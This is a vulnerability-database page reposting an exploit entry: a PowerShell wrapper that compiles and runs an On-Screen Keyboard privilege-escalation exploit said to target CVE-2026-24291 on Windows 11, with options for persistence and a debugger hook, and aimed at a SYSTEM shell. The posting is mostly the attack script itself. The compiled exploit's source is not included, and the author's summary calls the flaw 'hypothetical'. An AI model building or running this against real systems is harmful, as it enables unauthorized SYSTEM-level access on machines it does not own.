Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ OSK Privilege Escalation

๐Ÿ—“๏ธย 11 May 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 48ย Views

PowerShell wrapper to build and run On Screen Keyboard privilege escalation exploit on Windows 11.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft
18 Mar 202616:34
โ€“githubexploit
ATTACKERKB		CVE-2026-24291
10 Mar 202617:04
โ€“attackerkb
Circl		CVE-2026-24291
10 Mar 202616:57
โ€“circl
CNNVD		Microsoft Windows ๅฎ‰ๅ…จๆผๆดž
10 Mar 202600:00
โ€“cnnvd
CVE		CVE-2026-24291
10 Mar 202617:04
โ€“cve
Cvelist		CVE-2026-24291 Windows Accessibility Infrastructure (ATBroker.exe) Elevation of Privilege Vulnerability
10 Mar 202617:04
โ€“cvelist
EUVD		EUVD-2026-10614
10 Mar 202618:31
โ€“euvd
EUVD		EUVD-2026-10615
10 Mar 202618:31
โ€“euvd
Japan Vulnerability Notes		Security information for Hitachi Disk Array Systems
25 May 202602:39
โ€“jvn
Microsoft KB		March 10, 2026โ€”KB5078734 (OS Build 25398.2207)
10 Mar 202614:00
โ€“mskb
Rows per page
==================================================================================================================================
    | # Title     : OSK EoP Exploit Wrapper Build and Execution Automation Script                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting a hypothetical OSK (On-Screen Keyboard) Elevation of Privilege vulnerability.
    
    [+] POC        :  
    
    param(
        [switch]$Persist,
        [switch]$Debugger,
        [switch]$Force
    )
    
    Write-Host @"
    ========================================
      CVE-2026-24291 - OSK EoP Exploit
      SYSTEM Privilege Escalation
              by indoushka
    ========================================
    "@ -ForegroundColor Cyan
    
    $msvc = Get-ChildItem "C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe" -ErrorAction SilentlyContinue | Select-Object -First 1
    
    if (-not $msvc) {
        Write-Host "[!] Visual Studio not found. Install Build Tools." -ForegroundColor Red
        exit 1
    }
    
    $vcVars = "C:\Program Files\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"
    if (Test-Path $vcVars) {
        cmd /c "`"$vcVars`" > nul 2>&1 && cl.exe"
    }
    
    Write-Host "[*] Compiling exploit..." -ForegroundColor Yellow
    $source = "osk_eop.cpp"
    $output = "osk_eop.exe"
    
    if (Test-Path $output) { Remove-Item $output }
    
    & cl.exe /EHsc /O2 /MT $source /Fe$output /link advapi32.lib user32.lib
    
    if (-not (Test-Path $output)) {
        Write-Host "[!] Compilation failed" -ForegroundColor Red
        exit 1
    }
    
    Write-Host "[+] Compilation successful" -ForegroundColor Green
    
    Write-Host "[*] Starting OSK for initialization..." -ForegroundColor Yellow
    Start-Process "osk.exe" -WindowStyle Hidden
    Start-Sleep -Seconds 2
    Get-Process "osk" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    $args = @()
    if ($Persist) { $args += "--persist" }
    if ($Debugger) { $args += "--debugger" }
    
    Write-Host "[*] Running exploit..." -ForegroundColor Green
    & .\$output $args
    
    Write-Host "`n[*] Check for SYSTEM shell. UAC prompt may appear - dismiss it." -ForegroundColor Cyan
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.8
EPSS0.00044
SSVC
On Screen KeyboardPrivilege EscalationWindows ElevenExploit WrapperVisual StudioBuild Tools
48